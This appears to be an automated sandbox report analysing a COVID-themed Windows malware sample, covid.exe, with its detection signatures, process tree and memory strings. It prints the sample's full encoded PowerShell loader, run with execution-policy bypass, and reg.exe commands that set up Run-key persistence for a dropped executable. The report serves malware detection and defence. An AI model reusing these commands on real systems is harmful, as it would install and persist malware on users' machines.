
Analysis Report covid.exe

Overview

General Information

Sample Name: covid.exe
Analysis ID: 379751
MD5: a990c03d14bef241e880d6167fa5a6aa
SHA1: 210c7bed3182e3113b9a20816ced2f9c2ad6f86a
SHA256: 9d0cc73772d79a0561d03db4e6aca9fad9b125afbbc7f2b4f7f3df25eeed56a0

Most interesting Screenshot: (image not available in this text extract)

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Early bird code injection technique detected
Malicious encrypted Powershell command line found
Multi AV Scanner detection for submitted file
Allocates memory in foreign processes
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Encoded PowerShell Command Line
Uses cmd line tools excessively to alter registry or file data
Writes to foreign memory regions
Yara detected Powershell Load Encrypted Assembly
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • covid.exe (PID: 5760 cmdline: 'C:\Users\user\Desktop\covid.exe' MD5: A990C03D14BEF241E880D6167FA5A6AA)
    • powershell.exe (PID: 5720 cmdline: 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand [encoded command omitted here; the full value is listed under Sigma Overview] MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • iexplore.exe (PID: 4168 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' https://www.who.int/ MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
        • iexplore.exe (PID: 5956 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4168 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • reg.exe (PID: 6616 cmdline: 'C:\Windows\system32\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • reg.exe (PID: 6644 cmdline: 'C:\Windows\system32\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • buyonegetone.exe (PID: 6748 cmdline: 'C:\Users\user\AppData\Roaming\buyonegetone.exe' MD5: 3087BC614A52D038FC9F62DE3DD2C61F)
        • conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • mobsync.exe (PID: 6888 cmdline: C:\Windows\System32\mobsync.exe MD5: 99D4E13A3EAD4460C6E102E905E25A5C)
          • WerFault.exe (PID: 7016 cmdline: C:\Windows\system32\WerFault.exe -u -p 6888 -s 640 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • buyonegetone.exe (PID: 7120 cmdline: 'C:\Users\user\AppData\Roaming\buyonegetone.exe' MD5: 3087BC614A52D038FC9F62DE3DD2C61F)
    • conhost.exe (PID: 7148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • mobsync.exe (PID: 6224 cmdline: C:\Windows\System32\mobsync.exe MD5: 99D4E13A3EAD4460C6E102E905E25A5C)
      • WerFault.exe (PID: 4464 cmdline: C:\Windows\system32\WerFault.exe -u -p 6224 -s 636 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • buyonegetone.exe (PID: 4244 cmdline: 'C:\Users\user\AppData\Roaming\buyonegetone.exe' MD5: 3087BC614A52D038FC9F62DE3DD2C61F)
    • conhost.exe (PID: 1648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • mobsync.exe (PID: 5504 cmdline: C:\Windows\System32\mobsync.exe MD5: 99D4E13A3EAD4460C6E102E905E25A5C)
      • WerFault.exe (PID: 5108 cmdline: C:\Windows\system32\WerFault.exe -u -p 5504 -s 404 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • buyonegetone.exe (PID: 5172 cmdline: 'C:\Users\user\AppData\Roaming\buyonegetone.exe' MD5: 3087BC614A52D038FC9F62DE3DD2C61F)
    • conhost.exe (PID: 5132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • mobsync.exe (PID: 5240 cmdline: C:\Windows\System32\mobsync.exe MD5: 99D4E13A3EAD4460C6E102E905E25A5C)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source: C:\Users\user\Documents\20210401\PowerShell_transcript.131521.mteVmlsc.20210401080426.txt
Rule: PowerShell_Susp_Parameter_Combo
Description: Detects PowerShell invocation with suspicious parameters
Author: Florian Roth
Strings:
  • 0x15e:$sa2: -encodedcommand
  • 0x13b:$sc2: -noprofile
  • 0x146:$se3: -executionpolicy bypass
  • 0x136:$sf1: -sta

Source: C:\Users\user\Documents\20210401\PowerShell_transcript.131521.mteVmlsc.20210401080426.txt
Rule: JoeSecurity_PowershellLoadEncryptedAssembly
Description: Yara detected Powershell Load Encrypted Assembly
Author: Joe Security

Memory Dumps

Source: 00000001.00000002.263748578.000001A410EF0000.00000004.00000020.sdmp
Rule: PowerShell_Susp_Parameter_Combo
Description: Detects PowerShell invocation with suspicious parameters
Author: Florian Roth
Strings:
  • 0x3fa3:$sa2: -encodedcommand
  • 0x3f80:$sc2: -noprofile
  • 0x3f8b:$se3: -executionpolicy bypass
  • 0x3f7b:$sf1: -sta

Sigma Overview

System Summary:

Sigma detected: Suspicious Encoded PowerShell Command Line
Source: Process started
Author: Florian Roth, Markus Neis
Data: Command: 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA4ADMAOABjADYAMwA5ADcALQBhAGEANgBhAC0ANABjADIAZQAtAGEAZgAxADgALQAwADEAOABjADgAOAAwAGMAMwAzAGIAYgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABoAGEAcgBkAHoAXABEAGUAcwBrAHQAbwBwAFwAYwBvAHYAaQBkAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0A
CommandLine: (same value as Command)

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: covid.exe | Avira: detected
Multi AV Scanner detection for submitted file
Source: covid.exe | Virustotal: Detection: 15%
Source: covid.exe | ReversingLabs: Detection: 34%
Source: 0.0.covid.exe.c70000.0.unpack | Avira: Label: TR/Dropper.Gen2
Source: covid.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: unknown | HTTPS traffic detected: 23.111.9.35:443 -> 192.168.2.3:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.111.9.35:443 -> 192.168.2.3:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 199.232.136.157:443 -> 192.168.2.3:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 199.232.136.157:443 -> 192.168.2.3:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.168.2:443 -> 192.168.2.3:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.168.2:443 -> 192.168.2.3:49734 version: TLS 1.2
Source: covid.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe | Code function: 13_2_00007FF68605D1B8 FindFirstFileExW,13_2_00007FF68605D1B8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe | Code function: 18_2_00007FF6FE11D1B8 FindFirstFileExW,18_2_00007FF6FE11D1B8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe | Code function: 29_2_00007FF7E3D7D1B8 FindFirstFileExW,29_2_00007FF7E3D7D1B8

    Networking:

    barindex
    Potential dropper URLs found in powershell memoryShow sources
    Source: powershell.exe, 00000001.00000002.281304560.000001A414536000.00000004.00000001.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery8Q
    Source: powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateDatarame
    Source: powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmpString found in memory:
    Source: powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsolete
    Source: powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery
    Source: Joe Sandbox ViewIP Address: 23.111.9.35 23.111.9.35
    Source: Joe Sandbox ViewIP Address: 23.111.9.35 23.111.9.35
    Source: Joe Sandbox ViewJA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
    Source: base[1].js.7.drString found in binary or memory: "s.youtube.com"===t&&(t=OD(this.va)||"www.youtube.com")):t="video.google.com";this.Qj=t;PD(this,a,!0);this.L=new XC;g.H(this,this.L);t=b?b.innertubeApiKey:tD("",a.innertube_api_key);r=b?b.innertubeApiVersion:tD("",a.innertube_api_version);p=b?b.innertubeContextClientVersion:tD("",a.innertube_context_client_version);this.Mf={innertubeApiKey:uo("INNERTUBE_API_KEY")||t,innertubeApiVersion:uo("INNERTUBE_API_VERSION")||r,cH:g.M("INNERTUBE_CONTEXT_CLIENT_CONFIG_INFO"),dH:this.deviceParams.c,innertubeContextClientVersion:uo("INNERTUBE_CONTEXT_CLIENT_VERSION")|| equals www.youtube.com (Youtube)
    Source: base[1].js.7.drString found in binary or memory: (g.Km(b,"www.youtube.com"),c=b.toString()):c=mw(c);b=new Dy(c);b.set("cmo=pf","1");d&&b.set("cmo=td","a1.googlevideo.com");return b}; equals www.youtube.com (Youtube)
    Source: FL794448.htm.7.drString found in binary or memory: <iframe width="560" height="315" src="https://www.youtube.com/embed/yEIPefMsf70" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen title="WHO: A global response to a global pandemic"></iframe> equals www.youtube.com (Youtube)
    Source: base[1].js.7.drString found in binary or memory: Mga=function(a,b){if(!a.i["0"]){var c=new lB("0","fakesb",void 0,new hB(0,0,0,void 0,void 0,"auto"),null,null,1);a.i["0"]=b?new tA(new Dy("http://www.youtube.com/videoplayback"),c,"fake"):new dB(new Dy("http://www.youtube.com/videoplayback"),c,new aA(0,0),new aA(0,0),0,NaN)}}; equals www.youtube.com (Youtube)
    Source: base[1].js.7.drString found in binary or memory: g.YD=function(a){a=OD(a.va);return"www.youtube-nocookie.com"===a?"www.youtube.com":a}; equals www.youtube.com (Youtube)
    Source: base[1].js.7.drString found in binary or memory: g.k.clone=function(){var a=new Om;a.u=this.u;this.i&&(a.i=this.i.clone(),a.l=this.l);return a};var Vm="://secure-...imrworldwide.com/ ://cdn.imrworldwide.com/ ://aksecure.imrworldwide.com/ ://[^.]*.moatads.com ://youtube[0-9]+.moatpixel.com ://pm.adsafeprotected.com/youtube ://pm.test-adsafeprotected.com/youtube ://e[0-9]+.yt.srs.doubleverify.com www.google.com/pagead/xsul www.youtube.com/pagead/slav".split(" "),vda=/\bocr\b/;var wda=/(?:\[|%5B)([a-zA-Z0-9_]+)(?:\]|%5D)/g;var UD={f_:"LIVING_ROOM_APP_MODE_UNSPECIFIED",c_:"LIVING_ROOM_APP_MODE_MAIN",b_:"LIVING_ROOM_APP_MODE_KIDS",d_:"LIVING_ROOM_APP_MODE_MUSIC",e_:"LIVING_ROOM_APP_MODE_UNPLUGGED",a_:"LIVING_ROOM_APP_MODE_GAMING"};Ym.prototype.set=function(a,b){b=void 0===b?!0:b;0<=a&&52>a&&0===a%1&&this.i[a]!=b&&(this.i[a]=b,this.l=-1)}; equals www.youtube.com (Youtube)
    Source: base[1].js.7.drString found in binary or memory: g.k.getVideoUrl=function(a,b,c,d,e){b={list:b};c&&(e?b.time_continue=c:b.t=c);c=g.ZD(this);d&&"www.youtube.com"===c?d="https://youtu.be/"+a:g.JD(this)?(d="https://"+c+"/fire",b.v=a):(d=this.protocol+"://"+c+"/watch",b.v=a,nq&&(a=Ap())&&(b.ebc=a));return g.Id(d,b)}; equals www.youtube.com (Youtube)
    Source: base[1].js.7.drString found in binary or memory: g.oE=function(a){var b=g.ZD(a);!a.ea("yt_embeds_disable_new_error_lozenge_url")&&kha.includes(b)&&(b="www.youtube.com");return a.protocol+"://"+b}; equals www.youtube.com (Youtube)
    Source: base[1].js.7.drString found in binary or memory: g.yM.prototype.l=function(a){var b=this;$na(this);var c=a.wA,d=this.api.T();"GENERIC_WITHOUT_LINK"!==c||d.I?"TOO_MANY_REQUESTS"===c?(d=this.api.getVideoData(),this.bd(BM(this,"TOO_MANY_REQUESTS_WITH_LINK",d.Vm(),void 0,void 0,void 0,!1))):"HTML5_NO_AVAILABLE_FORMATS_FALLBACK"!==c||d.I?this.bd(g.zM(a.errorMessage)):this.bd(BM(this,"HTML5_NO_AVAILABLE_FORMATS_FALLBACK_WITH_LINK_SHORT","//www.youtube.com/supported_browsers")):(a=d.hostLanguage,c="//support.google.com/youtube/?p=player_error1",a&&(c= equals www.youtube.com (Youtube)
    Source: base[1].js.7.drString found in binary or memory: gia(this.videoData),this.V("highrepfallback");else if(a.i){b=this.l?this.l.l.l:null;if(Rva(a)&&b&&b.isLocked())var d="FORMAT_UNAVAILABLE";else if(!this.i.I&&"auth"===a.errorCode&&"429"===a.details.rc){d="TOO_MANY_REQUESTS";var e="6"}this.V("playererror",a.errorCode,d,g.KB(a.details),e)}else d=/^pp/.test(this.videoData.clientPlaybackNonce),oU(this,a.errorCode,a.details),d&&"manifest.net.connect"===a.errorCode&&(a="https://www.youtube.com/generate_204?cpn="+this.videoData.clientPlaybackNonce+"&t="+ equals www.youtube.com (Youtube)
    Source: base[1].js.7.drString found in binary or memory: h,l,"Trusted Ad Domain URL");this.Da=U(!1,a.privembed);this.protocol=0===this.Gc.indexOf("http:")?"http":"https";this.va=hw((b?b.customBaseYoutubeUrl:a.BASE_YT_URL)||"")||hw(this.Gc)||this.protocol+"://www.youtube.com/";l=b?b.eventLabel:a.el;h="detailpage";"adunit"===l?h=this.l?"embedded":"detailpage":"embedded"===l||this.u?h=rD(h,l,hha):l&&(h="embedded");this.Ca=h;xp();l=null;h=b?b.playerStyle:a.ps;var m=g.fb(xD,h);!h||m&&!this.u||(l=h);this.playerStyle=l;this.J=(this.I=g.fb(xD,this.playerStyle))&& equals www.youtube.com (Youtube)
    Source: base[1].js.7.drString found in binary or memory: oJ.prototype.replace=function(a,b){a=g.q(a);for(var c=a.next();!c.done;c=a.next())delete this.i[c.value.encryptedTokenJarContents];kka(this,b)};pJ.prototype.Zo=function(a){var b,c,d=null===(b=a.responseContext)||void 0===b?void 0:b.locationPlayabilityToken;void 0!==d&&(this.locationPlayabilityToken=d,this.i=void 0,"TVHTML5"===(null===(c=a.responseContext)||void 0===c?void 0:c.clientName)?(this.localStorage=lka(this))&&this.localStorage.set("yt-location-playability-token",d,15552E3):g.Sq("YT_CL",JSON.stringify({t6:d}),15552E3,void 0,!0))};var sJ;g.v(rJ,Mr);rJ.prototype.ow=function(a,b){a=Mr.prototype.ow.call(this,a,b);return Object.assign(Object.assign({},a),this.i)};var Bka=/[&\?]action_proxy=1/,Aka=/[&\?]token=([\w-]*)/,Cka=/[&\?]video_id=([\w-]*)/,Dka=/[&\?]index=([\d-]*)/,Eka=/[&\?]m_pos_ms=([\d-]*)/,Hka=/[&\?]vvt=([\w-]*)/,vka="ca_type dt el flash u_tz u_his u_h u_w u_ah u_aw u_cd u_nplug u_nmime frm u_java bc bih biw brdim vis wgl".split(" "),Fka="www.youtube-nocookie.com youtube-nocookie.com www.youtube-nocookie.com:443 youtube.googleapis.com www.youtubeedu.com www.youtubeeducation.com video.google.com redirector.gvt1.com".split(" "),xka={android:"ANDROID", equals www.youtube.com (Youtube)
    Source: unknownDNS traffic detected: queries for: www.who.int
    Source: mobsync.exe, mobsync.exe, 00000014.00000002.340204624.0000023F81490000.00000040.00000001.sdmpString found in binary or memory: http://code.jquery.com/
    Source: powershell.exe, 00000001.00000002.292130964.000001A42AF59000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: fa-regular-400[1].eot.7.drString found in binary or memory: http://fontello.com
    Source: fa-regular-400[1].eot.7.drString found in binary or memory: http://fontello.comFont
    Source: powershell.exe, 00000001.00000002.286213203.000001A423649000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000001.00000002.268280684.000001A4130EF000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: FL794448.htm.7.drString found in binary or memory: http://schema.org
    Source: powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 00000001.00000002.265257231.000001A412EE1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: msapplication.xml.6.drString found in binary or memory: http://www.amazon.com/
    Source: powershell.exe, 00000001.00000002.268280684.000001A4130EF000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: FL794448.htm.7.drString found in binary or memory: http://www.emro.who.int/index.html
    Source: FL794448.htm.7.drString found in binary or memory: http://www.euro.who.int/en/home
    Source: msapplication.xml2.6.drString found in binary or memory: http://www.live.com/
    Source: msapplication.xml6.6.drString found in binary or memory: http://www.wikipedia.com/
    Source: base[1].js.7.drString found in binary or memory: http://www.youtube.com/videoplayback
    Source: base[1].js.7.drString found in binary or memory: http://youtube.com/drm/2012/10/10
    Source: base[1].js.7.drString found in binary or memory: http://youtube.com/streaming/metadata/segment/102015
    Source: base[1].js.7.drString found in binary or memory: http://youtube.com/streaming/otf/durations/112015
    Source: base[1].js.7.drString found in binary or memory: http://youtube.com/yt/2012/10/10
    Source: base[1].js.7.drString found in binary or memory: https://admin.youtube.com
    Source: analytics[1].js.7.drString found in binary or memory: https://ampcid.google.com/v1/publisher:getClientId
    Source: FL794448.htm.7.drString found in binary or memory: https://app.powerbi.com/
    Source: FL794448.htm.7.drString found in binary or memory: https://cdn.who.int/media/images/default-source/who_homepage/thumbs_covid-map.tmb-479v.jpg
    Source: FL794448.htm.7.drString found in binary or memory: https://cdn.who.int/media/images/default-source/who_homepage/thumbs_interactive-timeline.tmb-479v.pn
    Source: powershell.exe, 00000001.00000002.286213203.000001A423649000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000001.00000002.286213203.000001A423649000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000001.00000002.286213203.000001A423649000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
    Source: FL794448.htm.7.drString found in binary or memory: https://covid19.who.int/
    Source: base[1].js.7.drString found in binary or memory: https://docs.google.com/get_video_info
    Source: powershell.exe, 00000001.00000002.268280684.000001A4130EF000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000001.00000002.286213203.000001A423649000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: base[1].js.7.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/osd.js
    Source: FL794448.htm.7.drString found in binary or memory: https://platform.twitter.com/widgets.js
    Source: base[1].js.7.drString found in binary or memory: https://redux.js.org/api/store#subscribelistener
    Source: FL794448.htm.7.drString found in binary or memory: https://s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5803f964fe6c9599
    Source: FL794448.htm.7.drString found in binary or memory: https://schema.org
    Source: analytics[1].js.7.drString found in binary or memory: https://stats.g.doubleclick.net/j/collect
    Source: base[1].js.7.drString found in binary or memory: https://support.google.com/youtube/?p=missing_quality
    Source: base[1].js.7.drString found in binary or memory: https://support.google.com/youtube/?p=noaudio
    Source: base[1].js.7.drString found in binary or memory: https://support.google.com/youtube/?p=report_playback
    Source: base[1].js.7.drString found in binary or memory: https://support.google.com/youtube/answer/6276924
    Source: analytics[1].js.7.drString found in binary or memory: https://tagassistant.google.com/
    Source: base[1].js.7.drString found in binary or memory: https://viacon.corp.google.com
    Source: FL794448.htm.7.drString found in binary or memory: https://www.afro.who.int/
    Source: analytics[1].js.7.drString found in binary or memory: https://www.google-analytics.com/debug/bootstrap
    Source: analytics[1].js.7.drString found in binary or memory: https://www.google-analytics.com/gtm/js?id=
    Source: analytics[1].js.7.drString found in binary or memory: https://www.google.%/ads/ga-audiences
    Source: base[1].js.7.drString found in binary or memory: https://www.googleapis.com/certificateprovisioning/v1/devicecertificates/create?key=AIzaSyB-5OLKTx2i
    Source: analytics[1].js.7.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=
    Source: FL794448.htm.7.drString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
    Source: FL794448.htm.7.drString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-5QFSQRT
    Source: FL794448.htm.7.drString found in binary or memory: https://www.paho.org/hq/index.php?lang=en
    Source: powershell.exe, 00000001.00000003.262923135.000001A42AFB3000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.268280684.000001A4130EF000.00000004.00000001.sdmp, FL794448.htm.7.drString found in binary or memory: https://www.who.int
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/ResourcePackages/WHO/assets/dist/images/logos/en/h-logo-blue.svg
    Source: powershell.exe, 00000001.00000002.293621546.000001A42B1B0000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.293726435.000001A42B226000.00000004.00000001.sdmpString found in binary or memory: https://www.who.int/T
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/about/governance/world-health-assembly/seventy-third-world-health-assembly
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/about/what-we-do/who-brochure
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/about/who-we-are/privacy-policy
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/ar/home
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/campaigns/
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/campaigns/connecting-the-world-to-combat-coronavirus/how-to-report-misinformatio
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/emergencies/crises/cod/en/
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/emergencies/diseases/novel-coronavirus-2019
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/emergencies/diseases/novel-coronavirus-2019/interactive-timeline
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/es/home
    Source: powershell.exe, 00000001.00000002.293726435.000001A42B226000.00000004.00000001.sdmpString found in binary or memory: https://www.who.int/f
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/fr/home
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/home
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/home/search?indexCatalogue=genericsearchindex1&wordsMode=AnyWord&searchQuery=
    Source: FL794448.htm.7.drString found in binary or memory: https://www.who.int/ictrp/search/en/
    Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/images/default-source/infographics/logo-who.tmb-1200v.jpg?Culture=en&sfvrsn=
    Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/news-room/events
    Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/news-room/releases
    Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/news/item#:ItemDefaultUrl
    Source: powershell.exe, 00000001.00000002.293726435.000001A42B226000.00000004.00000001.sdmp String found in binary or memory: https://www.who.int/nt/
    Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/pt/home
    Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/publications/en/
    Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/redirect-pages/mega-menu/data/announcement/world-health-statistics-2020
    Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/redirect-pages/mega-menu/emergencies/emergencies/democratic-republic-of-the-cong
